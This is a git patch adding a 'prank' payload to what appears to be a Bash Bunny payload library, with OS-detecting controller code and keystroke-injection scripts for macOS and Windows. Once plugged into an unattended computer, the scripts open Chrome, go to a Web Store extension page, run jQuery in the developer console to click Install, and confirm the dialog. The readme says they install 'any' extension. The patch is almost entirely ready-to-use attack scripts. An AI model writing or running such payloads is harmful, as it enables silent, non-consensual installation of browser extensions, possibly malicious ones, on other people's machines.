From 63453543754b9418e97e5ec551e575815013f066 Mon Sep 17 00:00:00 2001
From: Alex Flores <domain@me.com>
Date: Sat, 27 Jan 2018 18:26:53 -0500
Subject: [PATCH] Added chrome extension installer payload (#315)

- uses new AUTOETHERNET attackmode
 - uses new GET TARGET_OS functionality
 - uses new DEBUG function
 - uses new MAC_HAPPY extension
---
 payloads/library/prank/ncage/osx.txt     | 55 ++++++++++++++++++++++++
 payloads/library/prank/ncage/payload.txt | 44 +++++++++++++++++++
 payloads/library/prank/ncage/readme.md   | 26 +++++++++++
 payloads/library/prank/ncage/win.txt     | 35 +++++++++++++++
 4 files changed, 160 insertions(+)
 create mode 100644 payloads/library/prank/ncage/osx.txt
 create mode 100644 payloads/library/prank/ncage/payload.txt
 create mode 100644 payloads/library/prank/ncage/readme.md
 create mode 100644 payloads/library/prank/ncage/win.txt

diff --git a/payloads/library/prank/ncage/osx.txt b/payloads/library/prank/ncage/osx.txt
new file mode 100644
index 00000000..e9da9a08
--- /dev/null
+++ b/payloads/library/prank/ncage/osx.txt
@@ -0,0 +1,55 @@
+REM Title: Chrome Extension Installer
+REM Author: audibleblink
+DELAY 1000
+
+REM Open Extension URL
+GUI SPACE
+DELAY 500
+STRING chrome
+DELAY 500
+ENTER
+DELAY 4000
+GUI l
+DELAY 200
+STRING https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
+DELAY 500
+ENTER
+
+DELAY 3000
+
+REM Open the JavaScript console in the browser
+REM GUI-ALT j doesn't work, so we have to do it the long way
+CTRL F2
+DELAY 100
+STRING v
+DELAY 100
+DOWNARROW
+DELAY 100
+STRING d
+DELAY 100
+RIGHTARROW
+DELAY 100
+STRING j
+DELAY 100
+ENTER
+
+DELAY 3000
+
+REM Use jQuery to click the Install button
+STRING $("div[role='button']").click()
+ENTER
+
+DELAY 2000
+
+REM Confirm the installation
+REM Depends on a MacOS setting that allows tabbing through dialogs
+SHIFT TAB
+DELAY 300
+SPACE
+
+DELAY 4000
+
+REM Close the tabs you just opened
+GUI w
+DELAY 300
+GUI w
diff --git a/payloads/library/prank/ncage/payload.txt b/payloads/library/prank/ncage/payload.txt
new file mode 100644
index 00000000..7a183600
--- /dev/null
+++ b/payloads/library/prank/ncage/payload.txt
@@ -0,0 +1,44 @@
+#!/bin/bash
+
+# ATTENTION: Requires newest firmware with newest extensions
+
+# Installs the ncage (or any) Google Chrome extension
+# using jquery which is kindly supplied by the app store.
+
+## Status
+# | LED              | Status         |
+# | ---------        | -----------    |
+# | Magenta Solid    |  Setting up    |
+# | Blue Blinking    |  Attacking     |
+# | Green            |  Finished      |
+# | Red              |  Failed        |
+
+## Setup
+LED SETUP
+ATTACKMODE AUTO_ETHERNET ETHERNET_TIMEOUT_10
+GET TARGET_OS
+GET SWITCH_POSITION
+
+LED ATTACK
+
+case "$TARGET_OS" in
+
+  WINDOWS)
+    ATTACKMODE HID
+    QUACK ${SWITCH_POSITION}/win.txt
+    LED FINISH
+    ;;
+
+  MACOS)
+    MAC_HAPPY ATTACKMODE HID
+    QUACK ${SWITCH_POSITION}/osx.txt
+    LED FINISH
+    ;;
+
+  *)
+    DEBUG "ncage" "OS Not Detected"
+    LED FAIL2
+    ;;
+
+esac
+
diff --git a/payloads/library/prank/ncage/readme.md b/payloads/library/prank/ncage/readme.md
new file mode 100644
index 00000000..4921cb84
--- /dev/null
+++ b/payloads/library/prank/ncage/readme.md
@@ -0,0 +1,26 @@
+
+# nCage
+
+Author: audibleblink
+Version: 2.0
+
+## Description
+
+ATTENTION: Requires newest firmware (1.5+) with newest extensions
+
+Installs the ncage (or any) Google Chrome extension
+using jquery which is kindly supplied by the app store.
+
+## Configuration
+* Configure each ducky.{win,osx} file to your liking
+
+## Requirements
+Just plug and play
+
+## Status
+| LED              | Status              |
+| ---------        | -----------         |
+| Magenta Solid    |  Setting up         |
+| Blue Blinking    |  Attacking          |
+| Green            |  Finished           |
+
diff --git a/payloads/library/prank/ncage/win.txt b/payloads/library/prank/ncage/win.txt
new file mode 100644
index 00000000..ac6a4963
--- /dev/null
+++ b/payloads/library/prank/ncage/win.txt
@@ -0,0 +1,35 @@
+REM Title: Chrome Extension Installer
+REM Author: audibleblink
+DELAY 3000
+
+REM Open Extension URL
+GUI r
+DELAY 600
+STRING chrome https://chrome.google.com/webstore/detail/ncage/hnbmfljfohghaepamnfokgggaejlmfol
+DELAY 200
+ENTER
+
+DELAY 8000
+
+REM Open the JavaScript console in the browser
+CTRL-SHIFT j
+
+DELAY 4000
+
+REM Use jQuery to click the Install button
+STRING $("div[role='button']").click()
+ENTER
+
+DELAY 2000
+
+REM Confirm the installation
+TAB
+DELAY 300
+SPACE
+
+DELAY 5000
+
+REM Close the tabs you just opened
+CTRL w
+DELAY 300
+CTRL w